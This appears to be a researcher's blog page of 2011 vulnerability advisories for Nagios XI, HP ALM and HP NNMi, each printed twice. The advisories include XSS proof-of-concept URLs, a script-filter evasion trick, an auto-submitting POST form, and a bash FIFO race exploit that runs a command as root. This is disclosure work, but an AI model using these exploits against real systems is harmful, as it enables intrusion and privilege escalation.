================
Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple privilege escalations exist within Nagios XI installer.
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)
================
Timeline:
================
16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
14 December 2011 - Nagios Enterprises report fixed
14 December 2011 - Public disclosure
================
Details:
================
Vulnerability 1: Arbitrary RPM installation
-----
Files:
0-yum
1-prereqs
In certain situations files matching /tmp/epel-release*.rpm , /tmp/rpmforge-release*.rpm
and /tmp/php-pear-HTML-Template-IT*.rpm will be installed.
e.g. from e0-yum:
if ! rpm -q epel-release &>/dev/null; then
<snip>
cd /tmp
<snip>
rpm -Uvh epel-release*.rpm
-----
Vulnerability 2: Arbitrary crontab intallation
-----
Files:
install-crontab-root
install-crontab-nagios
uninstall-crontab-nagios
A malicious user can exploit a race condition to control the root and nagios user's
crontab. By creating the temporary file in advance (to control permissions) an attacker
can insert entries before it is used to update the crontab.
e.g. from install-crontab-root:
---
#!/bin/sh
crontab -l -u root | grep -v "/usr/local/nagiosxi/" > /tmp/root.crontab.new
cat nagiosxi/crontab.root >> /tmp/root.crontab.new
crontab -u root /tmp/root.crontab.new
rm -f /tmp/root.crontab.new
Wednesday 14 December 2011
0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9
================
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this
list is non-exhaustive, due to the sheer number of issues. Of particular note
is XSS on the login page, and the ability to pass XSS through the login page,
using the redirect parameter, e.g.
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)
================
Timeline:
================
16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
14 December 2011 - Nagios Enterprises report fixed
14 December 2011 - Public disclosure
================
Details:
================
Reflected XSS
-----
Page: /nagiosxi/login.php
Variables: -
PoCs: http://site/nagiosxi/login.php/";alert('0a29');"
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe
manner
Also affects:
/nagiosxi/about/index.php
/nagiosxi/about/index.php
/nagiosxi/about/main.php
/nagiosxi/account/main.php
/nagiosxi/account/notifymethods.php
/nagiosxi/account/notifymsgs.php
/nagiosxi/account/notifyprefs.php
/nagiosxi/account/testnotification.php
/nagiosxi/help/index.php
/nagiosxi/help/main.php
/nagiosxi/includes/components/alertstream/go.php
/nagiosxi/includes/components/alertstream/index.php
/nagiosxi/includes/components/hypermap_replay/index.php
/nagiosxi/includes/components/massacknowledge/mass_ack.php
/nagiosxi/includes/components/xicore/recurringdowntime.php/
/nagiosxi/includes/components/xicore/status.php
/nagiosxi/includes/components/xicore/tac.php
/nagiosxi/reports/alertheatmap.php
/nagiosxi/reports/availability.php
/nagiosxi/reports/eventlog.php
/nagiosxi/reports/histogram.php
/nagiosxi/reports/index.php
/nagiosxi/reports/myreports.php
/nagiosxi/reports/nagioscorereports.php
/nagiosxi/reports/notifications.php
/nagiosxi/reports/statehistory.php
/nagiosxi/reports/topalertproducers.php
/nagiosxi/views/index.php
/nagiosxi/views/main.php
Page: /nagiosxi/account/
Variables: xiwindow
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>
Page: /nagiosxi/includes/components/xicore/status.php
Variables: hostgroup, style
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>
Page: /nagiosxi/reports/alertheatmap.php
Variables: height, host, service, width
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>
Page: /nagiosxi/reports/histogram.php
Variable: service
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
Page: /nagiosxi/reports/notifications.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>
Page: /nagiosxi/reports/statehistory.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>
Stored XSS
-----
Page: /nagiosxi/reports/myreports.php
Variable: title
Details: It is possible to store XSS within 'My Reports', however it is believed this
is only viewable by the logged-in user.
1) View a report and save it, e.g.
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this
list is non-exhaustive, due to the sheer number of issues. Of particular note
is XSS on the login page, and the ability to pass XSS through the login page,
using the redirect parameter, e.g.
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)
================
Timeline:
================
16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
14 December 2011 - Nagios Enterprises report fixed
14 December 2011 - Public disclosure
================
Details:
================
Reflected XSS
-----
Page: /nagiosxi/login.php
Variables: -
PoCs: http://site/nagiosxi/login.php/";alert('0a29');"
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe
manner
Also affects:
/nagiosxi/about/index.php
/nagiosxi/about/index.php
/nagiosxi/about/main.php
/nagiosxi/account/main.php
/nagiosxi/account/notifymethods.php
/nagiosxi/account/notifymsgs.php
/nagiosxi/account/notifyprefs.php
/nagiosxi/account/testnotification.php
/nagiosxi/help/index.php
/nagiosxi/help/main.php
/nagiosxi/includes/components/alertstream/go.php
/nagiosxi/includes/components/alertstream/index.php
/nagiosxi/includes/components/hypermap_replay/index.php
/nagiosxi/includes/components/massacknowledge/mass_ack.php
/nagiosxi/includes/components/xicore/recurringdowntime.php/
/nagiosxi/includes/components/xicore/status.php
/nagiosxi/includes/components/xicore/tac.php
/nagiosxi/reports/alertheatmap.php
/nagiosxi/reports/availability.php
/nagiosxi/reports/eventlog.php
/nagiosxi/reports/histogram.php
/nagiosxi/reports/index.php
/nagiosxi/reports/myreports.php
/nagiosxi/reports/nagioscorereports.php
/nagiosxi/reports/notifications.php
/nagiosxi/reports/statehistory.php
/nagiosxi/reports/topalertproducers.php
/nagiosxi/views/index.php
/nagiosxi/views/main.php
Page: /nagiosxi/account/
Variables: xiwindow
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>
Page: /nagiosxi/includes/components/xicore/status.php
Variables: hostgroup, style
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>
Page: /nagiosxi/reports/alertheatmap.php
Variables: height, host, service, width
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>
Page: /nagiosxi/reports/histogram.php
Variable: service
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>
Page: /nagiosxi/reports/notifications.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>
Page: /nagiosxi/reports/statehistory.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>
Stored XSS
-----
Page: /nagiosxi/reports/myreports.php
Variable: title
Details: It is possible to store XSS within 'My Reports', however it is believed this
is only viewable by the logged-in user.
1) View a report and save it, e.g.
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>
Thursday 8 December 2011
0A29-11-2 : Privilege escalation vulnerability in HP Application Lifestyle Management (ALM) Platform v11
================
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.
================
Timeline:
================
30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure
================
Exploit:
================
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt # blocks for victim
while [ -e /tmp/tmp.txt ]; do
cat file > /tmp/tmp.txt
sleep 2
done
rm file
--
================
Details:
================
e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.
================
Timeline:
================
30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure
================
Exploit:
================
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt # blocks for victim
while [ -e /tmp/tmp.txt ]; do
cat file > /tmp/tmp.txt
sleep 2
done
rm file
--
================
Details:
================
e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---
Wednesday 23 November 2011
0A29-11-1 : Cross-Site Scripting vulnerabilities in HP Network Node Manager i 9.10
================
Cross-Site Scripting vulnerabilities in HP Network Node Manager i 9.10
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple XSS vulnerabilities exist within HP NNMi. In the case of GET
request XSS, this is due to a poorly implemented filter that does not
fully protect against XSS. In the case of POST request XSS, this
appears to be due to a lack of any filter.
Of particular note is the fact that if the user is not logged in they
are presented with the login page and the XSS is activated upon login.
================
Timeline:
================
01 November 2011 - Reported to HP. No response
10 November 2011 - HP publish HPSBMU02708 SSRT100633 rev.1 - HP Network
Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows,
Remote Cross Site Scripting (XSS) - unknown if related
16 November 2011 - Followup to HP. No response
23 November 2011 - Public disclosure
================
Details:
================
GET
-----
http://site/nnm/mibdiscover?node=<script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/configurationpoll.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/ping.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/statuspoll.jsp?nodename=</title><SCRIPT %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/traceroute.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
When the filter detects javascript contained in GET request arguments,
the server responds with an error 500 and a stack trace, which starts
with:
javax.servlet.ServletException: Detected JavaScript tag in QueryString: "nodename=%3C/title%3E%3CSCRIPT%3E"; decoded: "nodename=</title><script>"
com.hp.ov.nms.ui.framework.web.HttpContextFilter.assertNoXss(HttpContextFilter.java:282)
com.hp.ov.nms.ui.framework.web.HttpContextFilter.checkForXssAttack(HttpContextFilter.java:237)
With the PoCs above, this filter is evaded by including newline
characters before the closing ">" of script tags.
POST
-----
PoC HTML:
<body onLoad="submit()">
<form name="form" action="http://site/nnm/validate" method="post">
<input type="hidden" name="binderId" value="ConsoleBinder" />
<input type="hidden" name="operation" value="command" />
<input type="hidden" name="field" value="]]><a xmlns='http://www.w3.org/1999/xhtml'><body onload='alert(/0a29/)'/></a>" />
<input type="hidden" name="value" value="a" />
<input type="hidden" name="requestId" value="b" />
<input type="submit" class="button" name="button" />
</form>
<script>
function submit() { document.form.submit(); } </script></body>
Cross-Site Scripting vulnerabilities in HP Network Node Manager i 9.10
Author: 0a29406d9794e4f9b30b3c5d6702c708
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================
Multiple XSS vulnerabilities exist within HP NNMi. In the case of GET
request XSS, this is due to a poorly implemented filter that does not
fully protect against XSS. In the case of POST request XSS, this
appears to be due to a lack of any filter.
Of particular note is the fact that if the user is not logged in they
are presented with the login page and the XSS is activated upon login.
================
Timeline:
================
01 November 2011 - Reported to HP. No response
10 November 2011 - HP publish HPSBMU02708 SSRT100633 rev.1 - HP Network
Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows,
Remote Cross Site Scripting (XSS) - unknown if related
16 November 2011 - Followup to HP. No response
23 November 2011 - Public disclosure
================
Details:
================
GET
-----
http://site/nnm/mibdiscover?node=<script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/configurationpoll.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/ping.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/statuspoll.jsp?nodename=</title><SCRIPT %0D%0A>alert('0a29');</script%0D%0A>
http://site/nnm/protected/traceroute.jsp?nodename=</title><script %0D%0A>alert('0a29');</script%0D%0A>
When the filter detects javascript contained in GET request arguments,
the server responds with an error 500 and a stack trace, which starts
with:
javax.servlet.ServletException: Detected JavaScript tag in QueryString: "nodename=%3C/title%3E%3CSCRIPT%3E"; decoded: "nodename=</title><script>"
com.hp.ov.nms.ui.framework.web.HttpContextFilter.assertNoXss(HttpContextFilter.java:282)
com.hp.ov.nms.ui.framework.web.HttpContextFilter.checkForXssAttack(HttpContextFilter.java:237)
With the PoCs above, this filter is evaded by including newline
characters before the closing ">" of script tags.
POST
-----
PoC HTML:
<body onLoad="submit()">
<form name="form" action="http://site/nnm/validate" method="post">
<input type="hidden" name="binderId" value="ConsoleBinder" />
<input type="hidden" name="operation" value="command" />
<input type="hidden" name="field" value="]]><a xmlns='http://www.w3.org/1999/xhtml'><body onload='alert(/0a29/)'/></a>" />
<input type="hidden" name="value" value="a" />
<input type="hidden" name="requestId" value="b" />
<input type="submit" class="button" name="button" />
</form>
<script>
function submit() { document.form.submit(); } </script></body>
Subscribe to:
Posts (Atom)